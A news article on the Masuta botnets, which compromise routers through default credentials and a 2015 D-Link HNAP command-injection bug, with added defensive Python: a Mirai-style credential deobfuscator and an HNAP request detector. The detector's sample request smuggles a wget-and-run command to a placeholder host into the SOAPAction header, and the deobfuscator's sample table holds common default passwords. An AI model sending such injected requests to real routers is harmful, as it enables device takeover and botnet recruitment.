Fresh botnet recruiting routers with weak credentials
With a special HNAP exploit just for D-Link kit
Security researchers believe the author of the Satori botnet is at it again, this time attacking routers to craft a botnet dubbed "Masuta".
The Satori botnet seen in early January exploited a Huawei router zero-day; Masuta likewise goes after routers.
According to NewSky's analysis, the attack comes in two flavours. There's Masuta, which takes the standard IoT approach of trying default credentials against devices (the credential list is hidden by a single-byte XOR with 0x22, a trick borrowed from Mirai); and there's the more sophisticated "PureMasuta", which exploits an old network-administration bug.
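The XOR-by-0x22 trick is worth seeing in code. The example below is added here and is not code from NewSky's analysis or from the Masuta binary; it reimplements the obfuscation scheme from Mirai's source (a four-pass XOR with the 32-bit key 0xDEADBEEF) and shows why it is equivalent to a single XOR with 0x22, then recovers a constructed credential table the way an analyst would when pulling the password list out of a sample.

```python
"""Mirai-style credential obfuscation, as used by Masuta's default-password list.

Mirai's table.c XORs every byte of each stored string with each byte of
the 32-bit key 0xDEADBEEF in turn. XOR is associative, so four passes
with 0xDE, 0xAD, 0xBE and 0xEF collapse to one XOR with
0xDE ^ 0xAD ^ 0xBE ^ 0xEF == 0x22, which is the single-byte key the
analysis mentions.
"""
from typing import List

MIRAI_KEY = 0xDEADBEEF


def mirai_obfuscate(data: bytes, key: int = MIRAI_KEY) -> bytes:
    """Apply the four single-byte XOR passes that Mirai's table.c performs."""
    out = bytearray(data)
    for key_byte in key.to_bytes(4, "big"):
        out = bytearray(b ^ key_byte for b in out)
    return bytes(out)


def effective_key(key: int = MIRAI_KEY) -> int:
    """Fold a multi-byte XOR key into the single byte it is equivalent to."""
    folded = 0
    for key_byte in key.to_bytes(4, "big"):
        folded ^= key_byte
    return folded


def deobfuscate(data: bytes, key: int = 0x22) -> bytes:
    """Undo the obfuscation with the folded single-byte key."""
    return bytes(b ^ key for b in data)


def extract_credentials(blob: bytes, key: int = 0x22, min_len: int = 3) -> List[str]:
    """Recover NUL-terminated credential strings from an obfuscated table.

    Mirai obfuscates the terminating NUL along with the string, so the
    blob is decoded first and only then split on 0x00. Chunks that are
    too short or contain non-printable bytes are treated as noise.
    """
    plain = deobfuscate(blob, key)
    found = []
    for chunk in plain.split(b"\x00"):
        if len(chunk) >= min_len and all(0x20 <= c < 0x7F for c in chunk):
            found.append(chunk.decode("ascii"))
    return found


# Constructed sample table (not data from the Masuta binary): a few
# well-known default credentials, stored the way Mirai stores them.
SAMPLE_CREDENTIALS = [b"root", b"vizxv", b"admin", b"admin1234", b"888888"]
SAMPLE_BLOB = mirai_obfuscate(b"\x00".join(SAMPLE_CREDENTIALS) + b"\x00")

if __name__ == "__main__":
    print(hex(effective_key()))             # 0x22
    print(mirai_obfuscate(b"root").hex())   # 504d4d56, the "root" literal in Mirai's scanner.c
    print(extract_credentials(SAMPLE_BLOB))
```

The practical upshot for an analyst: if you find a Mirai descendant's string table and a one-byte XOR with 0x22 turns it into readable usernames and passwords, the author reused Mirai's obfuscation rather than writing their own.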
That bug dates back to 2015, when Craig Heffner found it in D-Link's implementation of the Home Network Administration Protocol (HNAP). That's what PureMasuta tries to exploit.
It is possible to craft a SOAP query which bypasses authentication by using hxxp://purenetworks.com/HNAP1/GetDeviceSettings. It is also feasible to run system commands (leading to arbitrary code execution) because of improper string handling. Combining the two, one can form a single SOAP request which first bypasses authentication and then causes arbitrary code execution.
Since the bug lets an attacker tack commands onto the GetDeviceSettings request and have the router run them, what PureMasuta's bot-herders do is run a wget to fetch and execute a shell script, recruiting the device into the botnet.
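For anyone watching router traffic or writing an HNAP handler, the tell-tale is simple: a legitimate HNAP call carries exactly "http://purenetworks.com/HNAP1/<ActionName>" in its SOAPAction header and nothing more. The detector below is an added example, not code from NewSky's write-up or from Heffner's advisory. It assumes, as the article implies, that the injected commands ride along in the SOAPAction header after GetDeviceSettings; the sample HTTP requests are constructed for illustration (192.0.2.x addresses, a made-up x.sh script) and are not PureMasuta's real payload.

```python
"""Flag HNAP SOAPAction abuse of the kind PureMasuta relies on.

A well-formed HNAP request names exactly one action in SOAPAction:
    "http://purenetworks.com/HNAP1/GetDeviceSettings"
The 2015 D-Link bug lets a request that names GetDeviceSettings skip
authentication, and the router's sloppy string handling then lets text
appended to the header reach a shell. So anything that continues past
the action name, and especially anything carrying shell metacharacters
or a downloader, is suspect. The strict allow-list check is also what a
hardened handler should apply before doing anything else.
"""
import re
from typing import Dict, Optional

# Only a bare action name may follow the HNAP1/ prefix (quotes optional).
HNAP_ACTION_RE = re.compile(
    r'^"?https?://purenetworks\.com/HNAP1/(?P<action>[A-Za-z0-9_]+)"?$'
)
SHELL_META_RE = re.compile(r"[`;|&<>]|\$\(")
FETCH_RE = re.compile(r"\b(?:wget|curl|tftp|ftpget)\b")


def parse_soapaction(raw_request: str) -> Optional[str]:
    """Return the SOAPAction header value of a raw HTTP request, or None."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "soapaction":
            return value.strip()
    return None


def is_valid_hnap_action(value: str) -> bool:
    """Strict allow-list: the check a router should make before trusting the header."""
    return HNAP_ACTION_RE.match(value) is not None


def classify_request(raw_request: str) -> Dict[str, str]:
    """Classify one raw HTTP request as benign HNAP, suspicious, malformed or not HNAP."""
    value = parse_soapaction(raw_request)
    if value is None:
        return {"verdict": "no-soapaction", "action": "", "reason": "not an HNAP call"}
    match = HNAP_ACTION_RE.match(value)
    if match:
        return {"verdict": "benign", "action": match.group("action"),
                "reason": "well-formed HNAP action"}
    partial = re.search(r"HNAP1/([A-Za-z0-9_]+)", value)
    action = partial.group(1) if partial else ""
    reasons = []
    if "GetDeviceSettings" in value:
        reasons.append("GetDeviceSettings named (unauthenticated path)")
    if SHELL_META_RE.search(value):
        reasons.append("shell metacharacters in SOAPAction")
    if FETCH_RE.search(value):
        reasons.append("downloader invoked")
    return {"verdict": "suspicious" if reasons else "malformed", "action": action,
            "reason": "; ".join(reasons) or "SOAPAction not of the expected form"}


# Constructed sample requests for illustration; not captured PureMasuta traffic.
BENIGN_REQUEST = (
    "POST /HNAP1/ HTTP/1.1\r\n"
    "Host: 192.0.2.1\r\n"
    'SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings"\r\n'
    "Content-Type: text/xml\r\n"
    "\r\n"
    "<?xml version=\"1.0\"?><soap:Envelope/>"
)
INJECTED_REQUEST = (
    "POST /HNAP1/ HTTP/1.1\r\n"
    "Host: 192.0.2.1\r\n"
    'SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings/'
    "`wget http://192.0.2.10/x.sh -O /tmp/x.sh; sh /tmp/x.sh`\"\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for req in (BENIGN_REQUEST, INJECTED_REQUEST):
        print(classify_request(req))
```

On the device side, is_valid_hnap_action() is the whole fix in miniature: reject any SOAPAction that is not a bare action name, and there is nothing left to inject. On the monitoring side, classify_request() run over proxied or captured HNAP traffic surfaces the fetch-and-run pattern the article describes without needing a signature for any one script URL.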
If you have a vulnerable device – D-Link's AC300, for example – make sure you're running firmware released after the 2015 fix.
NewSky attributes the botnet to an entity it dubs "Nexus Zeta" on the strength of the C&C URL nexusiotsolutions(dot)net, which is the same one the Satori botnet used. ®